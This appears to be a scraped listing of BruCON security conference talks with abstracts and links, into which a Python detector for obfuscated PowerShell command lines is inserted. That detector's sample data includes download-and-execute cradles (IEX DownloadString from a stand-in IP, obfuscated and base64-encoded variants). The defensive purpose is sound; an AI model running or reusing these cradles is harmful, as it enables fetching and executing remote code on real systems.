Invoke obfuscation powershell obfusk8tion techniquesDaniel BohannonThe very best attackers hide their commands from A/V and application whitelisting technologies using encoded commands and memory-only payloads to evade detection. These techniques thwart Blue Teams from determining what was executed on a target system. However, network defenders are catching on, and state-of-the-art detection tools now monitor the command line arguments for powershell.exe either in real-time or from event logs. We need new avenues to remain stealthy in a target environment. So, this talk will highlight a dozen never-before-seen techniques for obfuscating PowerShell command line arguments. As an incident responder at Mandiant, I have seen attackers use a handful of these methods to evade basic command line detection mechanisms. I will share these techniques already being used in the wild so you can understand the value each technique provides the attacker.
https://www.youtube.com/watch?v=DLtJTxMWZ2o<<MISSING>>
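The abstract's point is that monitoring the powershell.exe command line only works if the monitor can see through obfuscation. The block below is an added example and not Bohannon's tooling: a small scorer run over three constructed command lines in the shape of a Windows 4688 or Sysmon event 1 CommandLine field (one routine, one hand-built in the style of tick, concatenation and random-case obfuscation, one carrying an -EncodedCommand payload). It decodes the encoded form first, since powershell.exe accepts any unambiguous prefix of -EncodedCommand such as -e, -ec or -enc, and then counts indicators in the script text. The thresholds and weights are assumptions for the demo and would need tuning against a real baseline of admin scripts.

```python
import base64
import re

# Constructed samples. Line 2 is hand-built in the style of tick, string
# concatenation and random-case obfuscation; line 3 wraps a payload in
# -EncodedCommand (UTF-16LE then base64, as powershell.exe expects).
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/b.ps1')"
_ENCODED = base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode("ascii")

SAMPLE_COMMAND_LINES = [
    r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\ops\rotate-logs.ps1",
    r"""powershell.exe -w hidden -nop -c "iNvOkE-eXpReSsIoN (N`ew-Ob`je`ct N`et.`W`ebC`lie`nt).Do`wnl`oad`Str`in`g(('ht'+'tp://'+'198.51.100.7'+'/a.ps1'))" """,
    f"powershell.exe -NoP -NonI -W Hidden -Enc {_ENCODED}",
]

# Launch flags that are common in malicious one-liners but are not obfuscation
# by themselves, so they only add one point each.
LAUNCH_FLAGS = [
    r"-nop\b",
    r"-noni\b",
    r"-w(?:indowstyle)?\s+hidden\b",
    r"-e(?:p|xecutionpolicy)\s+bypass\b",
]


def decode_encoded_command(cmdline):
    """powershell.exe accepts any unambiguous prefix of -EncodedCommand
    (-e, -ec, -enc, ...). Return the decoded script, or None."""
    for m in re.finditer(r"-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})", cmdline, re.I):
        if "encodedcommand".startswith(m.group(1).lower()):
            try:
                return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def case_flips(token):
    """Number of upper/lower transitions in a token; rAnDoM cAsE scores high."""
    flips, prev = 0, None
    for ch in token:
        if ch.isalpha():
            cur = ch.isupper()
            if prev is not None and cur != prev:
                flips += 1
            prev = cur
    return flips


def analyze(cmdline):
    """Score one command line; a higher score means more obfuscation indicators."""
    score, reasons = 0, []
    decoded = decode_encoded_command(cmdline)
    text = cmdline
    if decoded is not None:
        score += 3
        reasons.append("encoded command, decoded and rescanned")
        text = decoded
    for flag in LAUNCH_FLAGS:
        if re.search(flag, cmdline, re.I):
            score += 1
            reasons.append("launch flag " + flag)
    ticks = text.count("`")
    if ticks >= 3:  # legitimate scripts use ` sparingly, for `n `t `"
        score += 2
        reasons.append(f"{ticks} backticks")
    concat = len(re.findall(r"""['"]\s*\+\s*['"]""", text))
    if concat >= 2:
        score += 2
        reasons.append(f"{concat} string concatenations")
    if re.search(r"\{\d+\}.*-f\b", text, re.I):
        score += 2
        reasons.append("-f format operator with positional placeholders")
    chars = len(re.findall(r"\[char\]", text, re.I))
    if chars >= 3:
        score += 2
        reasons.append(f"{chars} [char] casts")
    if re.search(r"\b(iex|invoke-expression)\b", text, re.I):
        score += 2
        reasons.append("Invoke-Expression / IEX")
    mixed = [t for t in re.findall(r"[A-Za-z][A-Za-z-]{5,}", text) if case_flips(t) >= 4]
    if mixed:
        score += 2
        reasons.append("random-case tokens: " + ", ".join(mixed[:3]))
    return {"score": score, "reasons": reasons, "decoded": decoded}
```

Command-line scoring of this kind only sees the first stage; once the indicators here are cheap to avoid, the durable signal is script block logging (event 4104), which records the de-obfuscated code PowerShell actually runs.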
33
Talk
0x07
CVE-SearchAlexandre Dulaunoy & Pieter-Jan MoreelsCve-search is free software to collect, search and analyse common vulnerabilities and exposures in software. cve-search has grown organically over the past months into a modular system to fetch, index, search and analyse Common Vulnerabilities and Exposures (CVE) and Common Platform Enumeration (CPE) entries as published by the US agency NIST.
https://www.youtube.com/watch?v=GyhvnX3BuTUBruCOn 0x07 - CVE Search.pdf
34
Keynote
0x07
Keynote - Looking Forward - Finding the right balance for INFOSECDavid KennedyWow. We’ve come a long way. Some would say not nearly far enough – but will it never be perfect? This industry has a lot of problems, and issues that need fixing, but there are so many good things that we’ve done to make the world a safer place. This talk will look at what we’ve done so far, the breaches we see and why they are still there, and what we need to continue to do to move forward. I’ll also be demonstrating (with live demos) some of the pitfalls of a lot of the “advanced” prevention technologies and why technology still struggles with stopping attackers.
https://www.youtube.com/watch?v=lqsN2T4RoJwBruCOn 0x07 - Infosec Today.pdf
35
Talk
0x07
OSXCollector: Automated forensic evidence collection & analysis for OS XKuba SendorWe use Macs a lot at Yelp, which means that we see our fair share of Mac-specific security alerts. Host based detectors will tell us about known malware infestations or weird new startup items. Network based detectors see potential C2 callouts or DNS requests to resolve suspicious domains. Sometimes our awesome employees just let us know, “I think I have like Stuxnet or Conficker or something on my laptop.” When alerts fire, our incident response team’s first goal is to “stop the bleeding” – to contain and then eradicate the threat. Next, we move to “root cause the alert” – figuring out exactly what happened and how we’ll prevent it in the future. One of our primary in-house Digital Forensics and Incident Response (DFIR) tools for root causing OS X alerts is OSXCollector.
https://www.youtube.com/watch?v=l-lhyPcSd6IBruCON 0x07 - OSXCollector.pdf
36
Talk
0x07
Advanced WiFi Attacks using Commodity HardwareMathy VanhoefThis talk explains how advanced low-layer attacks against WiFi can be implemented by modifying the firmware of off-the-shelf WiFi dongles. This allows us to use cheap $15 WiFi dongles to carry out attacks which previously required expensive USRP setups of more than $3500. Several types of attacks are implemented and tested. First, we show how to give ourselves a higher throughput than normally allowed. While there are some systems that attempt to detect such selfish behavior, we show that these can easily be bypassed. We then continue by creating a continuous jammer. Such a jammer makes the channel completely unusable for all devices. Based on this we also show how to implement a selective jammer, allowing one to jam only packets of specific clients. This is achieved by decoding the MAC header of a packet while it is still being transmitted, and jamming the remaining content of this packet if it is sent towards (or from) a client we are targeting. It’s surprising all this is possible using cheap hardware, in particular the selective jammer, since it must adhere to very strict timing constraints in order to timely jam the remaining content of the packet. We also turn our jamming attacks around and explain how they can be utilized to protect networks and devices. All combined this clearly shows jamming techniques can no longer be ignored. Finally we demonstrate how our low-layer attacks facilitate attacks against higher-layer protocols. In particular we use our modified firmware to implement a channel-based man-in-the-middle attack. This allows reliable manipulation of encrypted traffic, and can be utilized to break WPA-TKIP when used to protect broadcast packets. Interestingly we found that, though TKIP is nowadays rarely used to protect unicast traffic, it is still widely used to protect broadcast traffic.
https://www.youtube.com/watch?v=ak9vU1hpjhMBruCON 0x07 - Advanced Wifi Attack Using Commodity Hardware.pdf
37
Talk
0x07
Brain Waves Surfing - (In)Security in EEG TechnologiesAlejandro HernandezElectroencephalography (EEG) is a non-invasive method for the recording and the study of electrical activity of the brain taken from the scalp. The source of these brain signals is mostly the synaptic activity between brain cells (neurons). EEG activity is represented by different waveforms per second (frequencies) that can be used to diagnose or monitor different health conditions such as epilepsy, sleeping disorders, seizures and Alzheimer’s disease, among other clinical uses. On the other hand, brain signals are used for many other research and entertainment purposes, such as neurofeedback, arts and neurogaming. Nowadays, this technology is being adopted more and more in different industries. A brief introduction of BCIs (Brain-Computer Interfaces) and EEG will be given in order to understand the risks involved in our brain signals processing, storage and transmission. Live demos include the sniffing of brain signals over TCP/IP, MITM attacks to change data on the fly, DoS attacks to shut down EEG servers as well as flaws in well-known EEG applications when dealing with corrupted EDF (file format) samples. These demos are a first approach to demonstrate that many EEG technologies are prone to common network and application attacks. Finally, best practices and regulatory compliance on digital EEG will be discussed.
https://www.youtube.com/watch?v=oBTEwOZCsHYBruCON 0x07 - Brain Waves Surfing In Security in EEG.pdf
38
Talk
0x07
Levelling Up Security @ Riot GamesMark HillickIn his talk, Mark will be discussing his 2+ years at Riot Games. He will explain: • How the program was assessed • What gaps were identified • How the team has closed those gaps • What the team has learned (including successes as well as failures) • Where the Riot InfoSec team is headed. Warning: There will be no 0-days in this talk :)
https://www.youtube.com/watch?v=7Y8iLXkyD7wBruCON 0x07 - Levelling Up Security.pdf
39
Talk
0x07
SSO: It's the SAML SAML SituationDavid MortmanIt’s 2015 and single sign on systems have been around for over 15 years now. Despite the years of opportunity SSO is still really hard to do with any level of effectiveness. The advent of federation systems has, if anything, made things even harder. Sure there are standards like SAML which are supposed to help, but SAML options are like Tanenbaum’s line about standards: there are so many to choose from. Basically no two SAML implementations are alike, and the same goes for OAuth, which is supposed to help. I’ll talk about the assorted ways that SSO works and doesn’t work and how fundamental features like Single Log Out are generally not available. I’ll close out with some thoughts on future direction on how we might be able to make things better.
https://www.youtube.com/watch?v=dHq_9D-hD2Y<<MISSING>>
40
Talk
0x07
The .11 Veil, Camouflage & Covert! Invisible WiFi, RevealedRushikesh Nandedkar and Amrita IyerThe concept of invisibility has always been on the mind of human beings. Be that for good or evil, we hold it for some reason for sure. And so we try to incarnate the same thing in the world created by us, the world of technology, the world of binaries. Having said this, to give our bit of contribution towards achieving invisibility on air (IEEE 802.11), we tried to understand certain questions. And the answers resolved to the set of approaches we are sharing in this talk. They are as follows: 1. Elt Euphoria (an approach to smuggle data in legit frames) and its other variant 2. Patch Peloton (the absolute invisibility)
https://www.youtube.com/watch?v=1uwCWL_3ObkBruCON 0x07 - 11 Veil Covert And Camouflage Invisible Wifi Revealed.pdf
41
Keynote
0x07
Keynote - What BASE Jumping Taught Me about RiskShyama RoseThe odds of dying while BASE jumping are dismal: 1 in 6. As a BASE jumper myself who has lost several friends in the sport, I analyze the stark realities of security and risk in terms of life, death, and overall human safety. Both BASE jumping and hacking are fringe, sexy, and dangerous sports. I will discuss what a highly dangerous and deadly sport like BASE jumping has taught me about systematic risk reduction and how companies may be skewing information security risk.https://www.youtube.com/watch?v=p1iiFKUFTgUBruCON 0x07 - What BASE Jumping Taught Me About Risk.pdf
42
Talk
0x07
Nightmares of a PentesterChris NickersonHaving been a Penetration Tester for the last 15+ years I have seen many environments and technologies. I have had the pleasure / hell of testing systems I’ve never even heard of and the agony of defeat on a major scale. Instead of just going over what we used to work our way in, I want to go over the tricks the BLUE team used to keep us out! We will go over the technologies and techniques that have turned our traditional paths to root from minutes to months and the mistakes that got us “caught” along the way. Not all pentests are a dream and the nightmares CAN / DO happen. So, let’s talk about how YOUR environment can become an attacker’s worst nightmare instead of their favorite playground.
https://www.youtube.com/watch?v=2ufBtLw6QgYBruCON 0x07 - Nightmare of a Pentester.pdf
43
Talk
0x07
Creating REAL Threat Intelligence ... with EvernoteL. GrecsIn the presentation that threat intel vendors do not want you to see, threat data from open source and home grown resources meets Evernote as the ultimate braindump repository with the outcome of producing real actionable threat intelligence that your organization can leverage to stop the bad guys. This presentation discusses an experiment of using Evernote as an informal threat intelligence management platform, the specific concepts and strategies used, and its overall effectiveness. Specific topics covered include the advantages of using an open and flexible platform that can be molded into an open/closed source threat data repository, an information sharing platform, and an incident management system. Although using Evernote in this way in large enterprises is probably not possible, organizations can apply the same reference implementation to build similarly effective systems using open source or commercial solutions. And yeah … threat intel vendors still hold a role in ultimate threat intelligence nirvana but there is a lot you should do on your own first in order to better understand your requirements in searching for that ideal partner.
https://www.youtube.com/watch?v=dAWz2YmrKAIBruCON 0x07 - Threat Intel using Evernote.pdf
44
Talk
0x07
Shims For The WinWilli Ballenthin and Jon TomczakOver the past year, targeted attackers have rolled out new persistence mechanisms that evade existing detection technologies. In the past six months, we’ve identified multiple attacks that hijack the Application Compatibility Infrastructure shim databases (SDB) for code injection. This presentation digs deeply into the attacks and techniques for detection. We’ll cover technical details and implementations, specific recommendations for detection, and brand new tools for analysis. We will conclude by teaching you how to use these new investigative methods to detect artifacts of shim persistence in both large and small environments.
https://www.youtube.com/watch?v=wQEnUISOZPIBruCON 0x07 - Shims for the Win.pdf
45
Talk
0x07
Desired state: compromisedRyan Kazanciyan and Matt HastingsDesired State Configuration (DSC) is a core component of Microsoft’s new enterprise management technology that provides unique opportunities for administrators and attackers alike. It’s designed to monitor and maintain the configuration of a set of systems - even over the internet - with no Active Directory required. But in the wrong hands, a creative adversary can hijack DSC as an effective means of command-and-control using nothing but PowerShell scripts and built-in Windows features. First, we’ll demonstrate how to use DSC to infect systems and serve as a covert persistence mechanism for malware. We’ll walk through the steps needed to build a remote C2 server that manages compromised systems - and can even re-infect those that have been cleaned - with DSC and a bit of scripting. Our presentation will also highlight other DSC capabilities, such as transferring files or modifying the registry, that can be abused for malicious control of a system. After covering these intrusion scenarios, we’ll tackle the topic from the perspective of a defender or incident responder. We’ll illustrate the signs that DSC might be used on a compromised system, and how to investigate the forensic evidence it leaves behind. Proof-of-concept source code will accompany the presentation and our research.
https://www.youtube.com/watch?v=9zbNgcaf1AwBruCON 0x07 - Desired State Compromised.pdf
46
Talk
0x07
Unified DNS View to Track ThreatsDhia Mahjoub and Thomas MathewWorldwide visibility into DNS traffic below and above the recursive level is important to develop a unified view of the Internet threat landscape. Analyzing traffic patterns below the recursive resolvers allows for the creation of models that analyze client behavior. These models serve as a valuable source of information for investigating potentially new malicious domains. Monitoring authoritative traffic above the resolvers is an excellent source of information for tracking the underlying domain/IP hosting infrastructures for malware campaigns over time. Combining these two different views of the DNS and IP space provides the analyst invaluable intelligence for detecting emerging threats. The objective of this talk is to examine the methods we use at OpenDNS to analyze traffic at both the recursive and authoritative layers. We will present novel algorithms used to help identify traffic signal patterns at the recursive layer. https://www.youtube.com/watch?v=8edBgoHXnwg<<MISSING>>
47
Talk
0x07
Hacking as Practice for Transplanetary Life in the 21st CenturyRichard Thieme“In my end is my beginning,” said T. S. Eliot in The Four Quartets, and he might have been talking about hacking. Because radical hacking is a state of mind, an approach to life, the universe, everything, a practice that must be understood with humility, explored with persistence, and mastered with grace and a flair for style. It begins in the beginning. In Zen we hear of “beginners’ eyes,” which look with no preconceptions and see clearly what is there. That also means we can distinguish what’s in our own minds, see our perceptual apparatus and distinguish it from what’s “out there.” The boundary where those meet, where we half create and half perceive the reality in which we live, is the fertile area where radical hacking takes place. It’s the brackish tidewater in which new forms of life are evolving. So the future of hacking is in a way already here, a mold for possibility that draws us into itself. Those who allow the future to reach back to them and show them the way look like pioneers, creative geniuses, but really, they’re just hackers. The future may exist, but not as we think it does. It’s not “there” in an objective way, it’s there as a possibility, actualized when we instantiate it. If that sounds like quantum physics, maybe it is: studies testing ESP have detected hits at a rate greater than chance for the next perception, the next event, suggesting the future is already available to us here and now. But another point of view understands “the future” as how we hold ourselves here and now as possibilities for action. What we call the future is a range of possibilities and when we choose one, it happens in the now. And all is always now. Thieme suggests possibilities for hacking aligned with these insights based on his experience. https://www.youtube.com/watch?v=HdpmJZTKZx4<<MISSING>>
49
Talk
0x06
One packer to rule them allArne Swinnen and Alaeddine MesbahiLately, many popular Antivirus solutions claim to be the most effective against unknown and obfuscated malware. Most of these solutions are rather vague about how they supposedly achieve this goal, making it hard for end-users to evaluate and compare the effectiveness of the different products on the market. This white-paper presents empirically discovered results on the various implementations of these methods per solution, which reveal that some Antivirus solutions have more mature methods to detect x86 malware than others, but all of them are lagging behind when it comes to x64 malware. In general, at most three stages were identified in the detection process: Static detection, Code Emulation detection (before execution) and Runtime detection (during execution). New generic evasion techniques are presented for each of these stages. These techniques were implemented by an advanced, dedicated packer, which is an approach commonly taken by malware developers to evade detection of their malicious toolset. Two brand new packing methods were developed for this cause. By combining several evasion techniques, real-world malicious executables with a high detection rate were rendered completely undetected to the prying eyes of Antivirus products.https://www.youtube.com/watch?v=nPmbpBYmLpM<<MISSING>>
50
Keynote
0x06
Keynote - Infosec Life Lessons from Dr. SeussJennifer MinellaJennifer Minella is currently VP of Engineering and Consulting CISO with Carolina Advanced Digital, Inc. With more than 15 years’ experience working in the technology industry, Jennifer’s technical background covers specialized areas of infrastructure security, access control, wireless technologies, and industrial security. Most recently, Mrs. Minella has been involved in executive management of the organization, leading operations in engineering, security, business development and communications. In her engineering role, Jennifer leads strategic research and consulting for government agencies, educational institutions and Fortune 100 and 500 corporations. In addition to her normal business roles, Mrs. Minella is a published author, editorial contributor, and trusted adviser for information security topics to media. Much of Jennifer’s work can be found at her www.SecurityUncorked.com blog site. No stranger to public speaking, she’s presented at RSA Conference, NSA Trusted Computing Conference, Interop, Infosec World, DeepSec, SecTor, CSI and many other conferences. Mrs. Minella also serves on the international Board of Directors for (ISC)2 where she participates in roles to advance the communications and strategic efforts. Jennifer also serves on the Board of Directors for the (ISC)2 Foundation. https://www.youtube.com/watch?v=sXU_UE2jrCM<<MISSING>>
51
Talk
0x06
Cyber necromancy - resurrecting the deadMatthew Halchyshak and Joseph Tartarohttps://www.youtube.com/watch?v=VUSfPlrbXPg<<MISSING>>
52
Keynote
0x06
Keynote - Veteran startup CTO and authorAdam ShostackEveryone knows you ought to threat model, but in practical reality it turns out to be tricky. If past efforts to threat model haven’t panned out, perhaps part of the problem is confusion over what works, and how the various approaches conflict or align. This talk captures lessons from years of work helping people throughout the software industry threat model more effectively. It’s designed to help security pros, developers and systems managers, all of whom will leave with both threat modeling lessons from Star Wars and a proven foundation, enabling them to threat model effectively. Adam is a technologist, entrepreneur, author and game designer. He’s a member of the BlackHat Review Board and a principal program manager at Microsoft. He helped found the CVE and many other things. He is the author of “Threat Modeling: Designing for Security,” lead designer of Microsoft’s SDL Threat Modeling Tool v3 and the “Elevation of Privilege” game, the co-author of “The New School of Information Security” and co-designer of “Control-Alt-Hack.”https://www.youtube.com/watch?v=-2zvfevLnp4<<MISSING>>
53
Talk
0x06
Biting into the forbidden fruitKrzysztof KotowiczWe all know JS crypto is flawed, right? Over the years, the security community has pointed out its multiple fundamental problems. Several arguments were made and “JavaScript cryptography is bound to fail” became a mantra. Of course, despite all this JS crypto WAS used all over the place. In recent months, we tested various high-profile, in-the-wild crypto libraries, applications and systems. We saw code from home-grown cryptography to full-blown TLS or OpenPGP implementations. Hilarious bugs were spotted, protections were bypassed and systems were pwned. But was it really that different from what we all had already seen in OpenSSL, BouncyCastle or GnuPG? Does it mean that JavaScript cryptography can be secure like any other? During the talk vulns will be shown, authorities questioned, myths debunked, and browsers cursed upon. You’ll see the full picture - from XSS, to man-in-the-middle, to PRNGs and timing side-channels, even snippets in C. You’ll be left with an updated, solid and heavily opinionated view of JavaScript cryptography.https://www.youtube.com/watch?v=MYW84YkNG9Y<<MISSING>>
54
Talk
0x06
Stealing a mobile using wormholesMarkus VervierAuthentication in mobile networks is usually done using a secure element which is commonly a SIM card. It is a tamper resistant device that should prevent cloning of mobile identities by legitimate users as well as attackers. Mobile network operators as well as most users have an interest in preventing the cloning of a mobile network identity. As the mobile network identity is widely used as an authentication factor for online banking applications and for resetting account passwords for services at Google, Yahoo and others, protection of the mobile identity is even more important. A widespread assumption is that for successful authentication a SIM card needs to be present in a device. While this assumption might have been true in the era before smartphones, it is not valid anymore. Modern day smartphones have a multitude of communication channels besides the mobile network, for example Bluetooth, NFC, WiFi and generally a constant connection to the internet. We call these communication channels Wormholes as they allow data to travel from the mobile device to places it was never intended to go. In this talk we will learn how to access the SIM card on Android phones from a native application without special privileges. Additionally, techniques for forwarding GSM and 3G authentication vectors to different devices will be presented. As a special, a short walkthrough on analyzing and modifying the baseband firmware of a common class of Android phones will be given.https://www.youtube.com/watch?v=V6_mZyQdEuU<<MISSING>>
55
Talk
0x06
Data transforming your sewage into signaturesAdam Schoeman What happens when you collect a bunch of good data, under good pretences, only to realise that the findings that you were expecting are completely wrong? Before you quit infosec and retreat to a farm, allow me to tell you about how I data transformed my data sewage into useful signatures. This talk will lay some ground work as to how honeypots relate to traditional security controls and how they differ, especially with regards to what they ‘cost’ to run. Then we will look at how a very cheap honeypot can be built, and how value can be derived from its simplistic output. Finally, I will look at how you can find further value in large data sets by looking past the obvious and factorising, or transforming, the data. Did I mention that there will be drinking involved?https://www.youtube.com/watch?v=M_BppG-wXC8<<MISSING>>
56
Talk
0x06
Thunderbolts and LightningSnarePeople keep talking about Thunderbolt DMA attacks as though they’re a foregone conclusion. Prior to doing this research, we hadn’t seen one that didn’t involve using a Thunderbolt to FireWire adapter. This kind of attack, when performed against current hardware, is subject to the same limitations and mitigations as the FireWire DMA attacks we’ve seen since Kiwicon’s very own Metlstorm winlockpwned his way to fame in 2006. In this talk, snare will discuss the approach that he and rzn took when attacking systems with a Thunderbolt port. Will our heroes triumph over evil, or will they get hit by a bus?https://www.youtube.com/watch?v=epeZYO9qFbs<<MISSING>>
57
Talk
0x06
Security Makes Strange Bedfellows: Using Legal and Procurement To Secure Software Noel Dunne and Paco HopeThe penetration test finds a bug in the code that was coded four months ago and could have been prevented a year ago during requirements gathering. The vendor says they will fix it shortly after the software launches—if a change order is issued and they’re paid for their work. Many organisations find themselves paying for insecure software, paying for a security test, then paying the vendor to fix the software. It’s not just inefficient, it puts the enterprise and its customers at risk. An organisation’s procurement department, when supplied with the right assistance from security and legal teams, can be a very effective ally in this process. Are you a security person frustrated at vulnerabilities being fixed after they go live because they were caught so late? Are you a developer frustrated at the quality of software provided by a partner? This case study describes how one of the largest online retailers in the UK brought security, legal, and procurement into the same room and established security requirements that became part of the contract with vendors and service providers. When the security team discovers issues in the software, procurement can use contractual obligations to require vendors to fix broken software. The result is software that is substantially more secure at the beginning, and a lot more visibility into the partner’s software development lifecycle. We provide a three-step action plan and a framework for engaging legal and procurement in this process.https://www.youtube.com/watch?v=9HejCkjbEEU<<MISSING>>
58
Talk
0x06
Investigating Powershell attacks
Matt Hastings and Ryan Kazanciyan
Over the past two years, we’ve seen targeted attackers increasingly make use of PowerShell to conduct command-and-control in compromised Windows environments. If your organization is running Windows 7 or Server 2008 R2, you’ve got PowerShell 2.0 installed (and on Server 2012, remoting is enabled by default!). This has created a whole new playground of attack techniques for intruders that have already popped a few admin accounts (or an entire domain). Even if you’re not legitimately using PowerShell to administer your systems, you need to be aware of how attackers can enable and abuse its features. This presentation will focus on common attack patterns performed through PowerShell - such as lateral movement, remote command execution, reconnaissance, file transfer, and establishing persistence - and the sources of evidence they leave behind. We’ll demonstrate how to collect and interpret these forensic artifacts, both on individual hosts and at scale across the enterprise. Throughout the presentation, we’ll include examples from real-world incidents and recommendations on how to limit exposure to these attacks.
https://www.youtube.com/watch?v=J7mFCUp3FWA
<<MISSING>>
59
Talk
0x06
Using superpowers for hw reverse engineering
Joe Grand
Superpowers, normally used by superheroes in the battle of good versus evil, are also accessible to engineers and hackers in equipment used for failure analysis and verification of PCB fabrication and component assembly processes. In this mostly visual presentation, Joe shares his experiences of using lasers, X-rays, and sound waves to aid in the reverse engineering of electronic products and circuit boards.
https://www.youtube.com/watch?v=_UDlGnQz0B0
<<MISSING>>
60
Talk
0x06
The project of prototype this
Joe Grand and Zoz
Designing and building projects is hard. Designing and building projects of things that have never been done before is harder. Designing and building projects of things that have never been done before with the financial and time constraints of TV is ridiculous. For 18 months, noted hackers Joe “Kingpin” Grand and Zoz were co-hosts of the show Prototype This on the Discovery Channel International, an engineering entertainment program that followed the real-life design process of a unique prototype every episode. Comprised of an electrical engineer (Joe), a roboticist (Zoz), a material scientist, and a special effects guy, we had the major bases covered. A total of thirteen episodes were produced, each with their share of challenges and drama. Sometimes the prototypes worked, sometimes they didn’t, but they all involved interesting hacks and behind-the-scenes stories. Joe and Zoz have never talked about these projects in Europe before... In this very visual presentation, we’ll go through design details and show never-before-seen pictures and videos related to some of our favorite episodes, including the Traffic Busting Truck, Fire Fighter PyroPack, Virtual Sea Adventure, Waterslide Simulator, Flying Lifeguard, and as many more as we have time for. Speaking of time... each of these had to be designed and built in a matter of weeks!
https://www.youtube.com/watch?v=FpfGDT-OzcA
<<MISSING>>
61
Talk
0x06
Hacking driverless vehicles
Zoz
Are driverless vehicles ripe for the hacking? Autonomous and unmanned systems are already patrolling our skies and oceans and being tested on our streets and highways. Pioneering tests of autonomous vehicles were performed in Europe and all trends indicate these systems are at an inflection point that will show them rapidly becoming commonplace. It is therefore a salient time for a discussion of the capabilities and potential vulnerabilities of these systems. This session will be an informative and amusing look at the current state of civil driverless vehicles and what hackers or other miscreants might do to mess with them. Topics covered will include common sensors, decision profiles and their potential failure modes that could be exploited. With this talk Zoz aims to both inspire unmanned vehicle fans to think about robustness to adversarial and malicious scenarios, and to give the paranoid false hope of resisting the robot revolution. The talk will also contain brand new information from conversations with the US Department of Transportation including insights into the new Connected Vehicle and Vehicle To Vehicle Communications programs that may be hacking-relevant well before the adoption of fully autonomous cars and other vehicles.
https://www.youtube.com/watch?v=J4v0ENeV86E
<<MISSING>>
62
Talk
0x06
A distributed approach to mobile malware scanning
Daan Raman
In this presentation, we will discuss the advantages of a distributed online mobile malware scanning service for Android. To the service, a range of distributed clients can contribute and share malware scanning results. In our proof-of-concept called “ApkScan”, we’ve implemented several clients that analyze Android samples in a distributed manner. Each client combines static and dynamic analysis techniques to get an understanding of the potential maliciousness of an Android application. Each sample can be analyzed in parallel by a number of clients. Scan results generated by these clients can then be requested and further analyzed through an online API which we will introduce and make public during BruCON. Finally, we will present statistics on modern Android malware that has been analyzed by ApkScan over the past year. In that time period, more than 25.000 unique user-submitted and app store samples were analyzed.
<<MISSING>>
BruCON 0x06 - A distributed approach to mobile malware scanning - Daan Raman.pdf
63
Talk
0x06
Windows Crash Dump Exploration
Aaron Lemasters
The Microsoft Windows crash dump mechanism is perhaps one of the most crucial undocumented components to have survived the scrupulous eyes of reverse engineers and Windows internals experts for so long. Tucked away discreetly in the bowels of the operating system, the undocumented crash dump stack provides the operating system a powerful, fast and independent I/O path to the boot device used for various internal purposes (crash dump file generation, hibernation, and fast boot in Windows 8). Microsoft has provided some sparse and vague documentation for selective aspects of the crash dump stack, but only enough to expose the absolute minimum knowledge necessary for kernel driver developers to integrate their software. Past research has revealed that the crash dump driver stack can be manipulated using various bypass techniques to read and write to a mass storage device outside normal operating system use, providing both defensive and offensive use
<<MISSING>>
BruCON 0x06 - Evolution of crash dump research - Aaron Lemasters.pdf
64
65
Keynote
0x05
Keynote - David Mortman
David Mortman
<<MISSING INFO>>
https://www.youtube.com/watch?v=Qzm4YIKmzjk
<<MISSING>>
66
Talk
0x05
Geolocation of GSM mobile devices
David Perez and Jose Pico
Geolocation of mobile devices (MS) by the network has always been considered of interest, for example, to locate people in distress calling an emergency number, and so the GSM standard provides different location services (LCS), some network-based, and some MS-based or MS-assisted. OK, but what if a third party, without access to the network, was interested in knowing the exact position of a particular MS? Could he or she locate it? In this presentation we will show that this is indeed possible, even if the MS does not want to be found, meaning that the device has all its location services deactivated. We will demonstrate a system we designed and built for this purpose, that can be operated in any standard vehicle, and which can pinpoint the exact location of any target MS in a radius of approximately 2 kilometers around the vehicle. Yet, the main focus of the presentation will not so much be the system itself as it will be the process we followed for its design and implementation. We will describe in detail the many technical difficulties that we encountered along the way and how we tackled them. We believe this can be useful for people embarking themselves in similar research projects. Obviously, a system like this cannot be demonstrated live in the room (it would be quite illegal), but we will show videos of the different consoles of the system, operating in different environments.
https://www.youtube.com/watch?v=xp_KmAiHN3E
<<MISSING>>
67
Talk
0x05
Paint by Numbers vs. Monet
Russ Gideon
Penetration testing came about because of real world attacks. The industry quickly realized that we need to behave like the attackers to learn how to defend against attackers, and thus the penetration testing industry was born. Back then the approach to attacks was very paint by numbers. If an exploit was found it was released in raw format, possibly/probably perfected by others, and released. Our methodologies and detections for defense against these attacks were derived from this type of approach. This approach became very paint by numbers! The initial training on this concept was derived from real world attacks, and we have evolved that training but a few years ago stopped quickly mimicking the real attackers. Why did we do this? It isn’t because as an industry we didn’t want to advance it but it was because it became very difficult to. Why so difficult? Because the times have changed, and people are not just giving out things like they used to. Attackers don’t take that approach. They find a vulnerability/exploit and treat it as very special, they understand it, they research all aspects of it, and then they weaponize it. This approach takes time and money and takes a Monet. Yes there are plenty of lookalike Monet paintings, but none have the brush stroke characteristics that true Monet paintings do. Our current approach to detecting and resembling real attacks is still very paint by numbers. Our commercial off-the-shelf tools are great tools, and can help something look like a Monet, but when you look at the brush strokes you can see it is a paint by numbers. We will be reviewing some Tactics, Techniques, and Procedures (TTP) scenarios from real world attacks and showing the not so common differences between true attacker TTPs and current penetration testing methodologies, TTPs, and tools. This talk will focus on the binary aspects of these scenarios to show significant differences and some similarities of current attack patterns. This presentation is designed to show viewers the very low level details that we are overlooking in how to replicate true malicious attackers. This common trend to use off-the-shelf tools to conduct penetration tests has replaced a significant amount of tool writing which has and will help the industry, but this has come at an expense as well.
https://www.youtube.com/watch?v=rMm6_GF_i_E
<<MISSING>>
68
Talk
0x05
Data-plane networking
Robert Graham
